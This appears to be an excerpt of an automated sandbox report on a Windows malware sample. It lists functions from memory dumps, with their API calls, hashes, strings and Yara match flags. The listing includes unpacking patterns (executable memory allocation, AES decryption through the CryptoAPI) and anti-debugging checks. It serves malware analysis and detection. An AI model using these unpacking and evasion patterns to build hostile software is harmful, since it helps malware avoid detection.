Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a26ac681bf338d73268d2aee466c61eda6088d0a1f48d95a4ac53d6a0490310c
Instruction ID: d8fe6155ad8c1d7911cb985311367cc8e1d1847852ab8a38854bd77290262c5b
Opcode Fuzzy Hash: a26ac681bf338d73268d2aee466c61eda6088d0a1f48d95a4ac53d6a0490310c
Instruction Fuzzy Hash: FB9109FB70C211BD754285456B54AFB6BADE6C6730330842BFC87C6A12FA94EE896131

Function 04D50D04 Relevance: 1.9, APIs: 1, Instructions: 437COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: d9177ca67718afe4ac1744f12c922a57038005fa1ce715e98bdb7ae2f1be792a
Instruction ID: 1c8269eac546ec7c49dfa0f507a472c7b0c69436f0909d8aa390755d06311ee3
Opcode Fuzzy Hash: d9177ca67718afe4ac1744f12c922a57038005fa1ce715e98bdb7ae2f1be792a
Instruction Fuzzy Hash: 599128FB70C211BD764285456B54AFB6BADE5C7730330842BFC87C6A12FA94EE896131

Function 04D50D49 Relevance: 1.9, APIs: 1, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27582b2a91ceee958ca5bd2b5b8236f6b4e67f48850f3692fdd83985212114f2
Instruction ID: 7536fc8e8d46e70f4e950057d7e5b68917427e19cbdba5d2e701b552c4bdc7d8
Opcode Fuzzy Hash: 27582b2a91ceee958ca5bd2b5b8236f6b4e67f48850f3692fdd83985212114f2
Instruction Fuzzy Hash: 998127FB70C211BD794385456B54AFBABADE5C6330330842BFC87C6612FA84EE896131

Function 04D50D5C Relevance: 1.9, APIs: 1, Instructions: 415COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 9a933b6a0f06c6817b94dc9487d463dcf92dd949ef9ead82f2c62cbb4d2faf5f
Instruction ID: 80cd8b3b4c559e172e44742bc0d816c95dde18eca08c69b26f32cf906f431f88
Opcode Fuzzy Hash: 9a933b6a0f06c6817b94dc9487d463dcf92dd949ef9ead82f2c62cbb4d2faf5f
Instruction Fuzzy Hash: 3E8115FB70C211BD754285456B54AFBABADE6C6730330842BFC87C2612FA94EE896131

Function 04D50D87 Relevance: 1.9, APIs: 1, Instructions: 399COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 6981bb3f29aed38205444d65762b39b3817e0582a4aa6b2b5726ff3922f05ca0
Instruction ID: 59d00905cdbca88329cf905bfc456f1f5d26dd4138125e04eac1b0494a0e4a91
Opcode Fuzzy Hash: 6981bb3f29aed38205444d65762b39b3817e0582a4aa6b2b5726ff3922f05ca0
Instruction Fuzzy Hash: AB8119FB70C211BD764285456B54AFBABADE6C6730330846BFC47C6612FA90EE896131

Function 04D50DB4 Relevance: 1.9, APIs: 1, Instructions: 388COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 874137a511b12f10db95accd4bf00eb942b1ddec6daf56a52339b3f63f01c2d8
Instruction ID: d4c4c430817f371b44097c2d4856e6e548a8edf82c042bdab62cb768dad406e0
Opcode Fuzzy Hash: 874137a511b12f10db95accd4bf00eb942b1ddec6daf56a52339b3f63f01c2d8
Instruction Fuzzy Hash: 498107EB70C211BD7A4285456B54AFBABADE6C63303308527FC47C6612FA90EE896131

Function 04D50DC8 Relevance: 1.9, APIs: 1, Instructions: 381COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: f0db330afe493e787d1f4bc70f752113babb79f2b6372955d456053b02fbb58b
Instruction ID: 60c3fbf4fa4d4ef9e7885ea6fdbddf20778d0a42fafb04731e777ab1973b8fc6
Opcode Fuzzy Hash: f0db330afe493e787d1f4bc70f752113babb79f2b6372955d456053b02fbb58b
Instruction Fuzzy Hash: 207105FB70C211BD7642C5456B54AFBABADE6C63303308426FC47C6612FA94EE896231

Function 04D50E0E Relevance: 1.9, APIs: 1, Instructions: 373COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 260c927067d72519e6bbddd2279a3d8fa0eb7a7667c3a0ca9330382b6bb77283
Instruction ID: 0a28cff14ec9e733bb6cb523688802f314cda6f541934c562f2b8dd1b35d6e67
Opcode Fuzzy Hash: 260c927067d72519e6bbddd2279a3d8fa0eb7a7667c3a0ca9330382b6bb77283
Instruction Fuzzy Hash: DC7119FB70C211BD7942D5456B54AFB6BADE6C63303308527FC87C6612FA90EE896530

Function 04D50DE9 Relevance: 1.9, APIs: 1, Instructions: 364COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: c8aa96942f33be20f812b9847bc701bdba6f0078509837a2d6dbdb8bb6935c8f
Instruction ID: 95a490670fc249d4e99021bd5ea8d91587dbf84ff8d33fa786434c43c369946f
Opcode Fuzzy Hash: c8aa96942f33be20f812b9847bc701bdba6f0078509837a2d6dbdb8bb6935c8f
Instruction Fuzzy Hash: 487127FB70C211BD7542D5456B54AFB6BADE6C6330330C42AFC87C6612FA90EE896130

Function 04D50E24 Relevance: 1.8, APIs: 1, Instructions: 340COMMON

Download Yara Rule

APIs

RtlUnicodeStringToAnsiString.NTDLL(?,?,00000001), ref: 04D50E35

Memory Dump Source

Source File: 00000000.00000002.3074491333.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d50000_WwVs3PavPg.jbxd

Similarity

API ID: String$AnsiUnicode
String ID:
API String ID: 309727707-0
Opcode ID: 584bfb94494b9df7873507286a810b278d1f55893f80b6244c56476c0238445b
Instruction ID: 14566ec1c8deb06f326a697a8e7e517acb5a8d74f11139dcf3cbf2e3232a9ad9
Opcode Fuzzy Hash: 584bfb94494b9df7873507286a810b278d1f55893f80b6244c56476c0238445b
Instruction Fuzzy Hash: 7A7128FB70C211BD764285456B54AFB6BADE6C63303308526FC87C6612FA90EE896230

Function 009A64CB Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 009A6595

Memory Dump Source

Source File: 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a2000_WwVs3PavPg.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: e1507dc9259aa821bc59745c01ae26cd7889eab05bb855a7c3cffedc4d453051
Instruction ID: ded50b51743442704eb94f774ba110c2ef4f97e35238fc46168b387e3fb19b3d
Opcode Fuzzy Hash: e1507dc9259aa821bc59745c01ae26cd7889eab05bb855a7c3cffedc4d453051
Instruction Fuzzy Hash: AB114C7140429E9EDF12DF60C848BDE3BA4EF07315F590522E98186D52D7BA8CA4DB89

Function 00A9F811 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?), ref: 00A9F887

Memory Dump Source

Source File: 00000000.00000002.3069516453.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9f000_WwVs3PavPg.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e890a42d1331fa25203d95068577dae27e43049aa18e18f5e28582ac1dd6eef3
Instruction ID: ac8414d112cca5ab840a6d7433062894a445a4e5051377b2992c8f7d1e1ee8e2
Opcode Fuzzy Hash: e890a42d1331fa25203d95068577dae27e43049aa18e18f5e28582ac1dd6eef3
Instruction Fuzzy Hash: 51F05E7660956AAFEF40CF119911BFE77B4EF84720FA1C569E802CA854C37A1C50DB68

Function 0041249E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD

Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20

Memory Dump Source

Source File: 00000000.00000002.3075765310.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3075732775.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075798355.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075822200.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_WwVs3PavPg.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
Opcode Fuzzy Hash: e19d539462f031469c69ea45d1cad77acc71583726438384a09bba2e4039781a
Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2

Function 00A9F821 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?), ref: 00A9F887

Memory Dump Source

Source File: 00000000.00000002.3069516453.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9f000_WwVs3PavPg.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a379352d4e08a0f0f22cb36296d71e25c3a3359cadecda7b26e77ddc99b47760
Instruction ID: 5e12d038ffa21e8bbde3eb43d39dbc1fcb1d27ce2a6984832eacef09194e39b6
Opcode Fuzzy Hash: a379352d4e08a0f0f22cb36296d71e25c3a3359cadecda7b26e77ddc99b47760
Instruction Fuzzy Hash: CBF0203620812EAFEF41CF208960BFE3BB4EF85320F20C178E846CA412C7365C418728

Function 00A9F83E Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?), ref: 00A9F887

Memory Dump Source

Source File: 00000000.00000002.3069516453.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9f000_WwVs3PavPg.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 976c06b274f2d0f9c5540c78071333f71bd7be24b07764ce5c44770ac74781b5
Instruction ID: c7d1c8785bc1daa45a4be30a9906a5a85f601a30b215345deffe876611b9d66f
Opcode Fuzzy Hash: 976c06b274f2d0f9c5540c78071333f71bd7be24b07764ce5c44770ac74781b5
Instruction Fuzzy Hash: 69E0223B31802D9FEF10CE61A5017AD37A0EFD4320F308531E946D7921C3264E628B58

Function 00A9F86A Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?), ref: 00A9F887

Memory Dump Source

Source File: 00000000.00000002.3069516453.0000000000A9F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a9f000_WwVs3PavPg.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b51c5d71040cf0ec05351672edb86c52d6342a4fad2759a4b89f7197c860233a
Instruction ID: b9589b21506ecd9a4bdbbe2e6c16822929ced05a2adc7c4a06d6cb8312b79210
Opcode Fuzzy Hash: b51c5d71040cf0ec05351672edb86c52d6342a4fad2759a4b89f7197c860233a
Instruction Fuzzy Hash: 24E0CD3124822E9FEF01CF10E805B9E3791EF45710F104004E944CB5A6C3775C11C748

Function 0040E268 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0040E27B

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680

Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 10005C07

Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64

Memory Dump Source

Source File: 00000000.00000002.3075765310.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.3075732775.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075798355.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3075822200.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_WwVs3PavPg.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691

Function 00D39C3D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00D39C8E

Memory Dump Source

Source File: 00000000.00000002.3071582950.0000000000D39000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D39000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d39000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 8c83d3aa1a0e3122f92ce3ac2c99d30809e755dac8d7343d15c3e9c1ecbcbe72
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 84112A79A00208EFDB01DF98C995E98BBF5AF08350F098094F9489B362D371EA50DF90

Function 00402BF0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9

Function 00402C10 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C

Memory Dump Source

Source File: 00000000.00000002.3069083546.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3069083546.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_WwVs3PavPg.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84

Non-executed Functions

Function 04B43B27 Relevance: 31.4, APIs: 9, Strings: 8, Instructions: 1645COMMON

Download Yara Rule

Strings

rB, xrefs: 04B44DB5
rB, xrefs: 04B43DD6
]DFE, xrefs: 04B444F4
rB, xrefs: 04B442AC
rB, xrefs: 04B450DE
rB, xrefs: 04B46527
FOKD, xrefs: 04B4431F
DFEK, xrefs: 04B45143

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
API String ID: 0-735762442
Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
Instruction ID: f9dcea7f7b74f7a7a3300ace79cc6978366e73db8824ea66bee9f315b22b43fa
Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
Instruction Fuzzy Hash: EAE2C2B0D002589BEB24EF68CC54BEDBB74EF91308F1041D8D5496B281DB757A88EFA5

Function 04B43727 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 04B437A7
CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 04B437CB
_mbstowcs.LIBCMT ref: 04B4381E
CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04B43835
GetLastError.KERNEL32 ref: 04B4383F
CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04B43867
GetLastError.KERNEL32 ref: 04B43871
CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B43881
CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04B43943
CryptDestroyKey.ADVAPI32(?), ref: 04B439B5

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04B43783

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3642901890-63410773
Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
Instruction ID: 4fe274e54d431eebfbc365bd5b69b411441be6651f31eb9a9068311ca2197b44
Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
Instruction Fuzzy Hash: F6818471B00218AFEF209F24CC45B9ABBB5FF89300F0481E5E94DE7290DB319A849F55

Function 04B49A19 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 04B49A25
IsDebuggerPresent.KERNEL32 ref: 04B49AF1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04B49B11
UnhandledExceptionFilter.KERNEL32(?), ref: 04B49B1B

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction ID: 3f826736889305ecb234e0bb4f6114a69f31afa50bf0e8fcc6e92b3813a43dd4
Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
Instruction Fuzzy Hash: AC311AB5D4121C9BDB20DFA4D989BCDBBB8BF48304F1040EAE409A7250EB715A85DF04

Function 04B4C31A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 04B4C412
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 04B4C41C
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 04B4C429

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
Instruction ID: 46b9c7b27c31c4f677a546c9b3137b8e337d51f6eae02f45cfbb35a4547c6502
Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
Instruction Fuzzy Hash: 5831C7B490122CABCB61DF28DD887DDBBB4BF48710F5041EAE41CA7250E770AB859F49

Function 04B4F174 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F196
TerminateProcess.KERNEL32(00000000,?,04B4F173,00000000,0041D0A0,?,00000000,?,04B51714), ref: 04B4F19D
ExitProcess.KERNEL32 ref: 04B4F1AF

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction ID: 5a0b6906482cab578f04eaf4a73385882b6fb4f46445c91b1b3a9aa926e356b2
Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
Instruction Fuzzy Hash: 0FE0B671844118AFDB117F54DD48A993B69FF90685F004464F80587231CB76E991DB94

Function 04B4092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 04B40966
GetProcAddress., xrefs: 04B409DC, 04B409DF, 04B409E4
., xrefs: 04B4095F

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: d5037ae184a1353f3a29f5d41dbbdc7d36793d66b344cbbfc880b87a4d66a8bb
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: FB316CB6910609DFEB10DF99C880AAEBBF5FF48324F14408AD941A7310D771FA45DBA4

Function 04B4F587 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
